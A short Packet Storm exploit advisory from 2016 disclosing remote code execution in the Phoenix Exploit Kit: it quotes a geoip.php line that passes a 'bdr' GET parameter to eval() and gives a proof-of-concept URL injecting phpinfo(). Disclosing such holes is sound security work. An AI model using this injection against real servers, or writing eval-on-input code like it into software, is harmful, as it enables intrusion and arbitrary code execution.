Phoenix Exploit Kit Remote Code Execution

2016-06-30T00:00:00
ID PACKETSTORM:137728
Type packetstorm
Reporter CrashBandicot
Modified 2016-06-30T00:00:00

Description

                                        
                                            `# Exploit Title: Phoenix Exploit Kit - Remote Code Execution  
# Exploit Author: CrashBandicot @DosPerl  
# Date: 2016-06-30  
# Tested on: MSWin32  
  
# Vuln file : geoip.php  
  
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');  
  
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();  
  
# Screen : http://i.imgur.com/E7RBBRk.png  
  
__END__  
`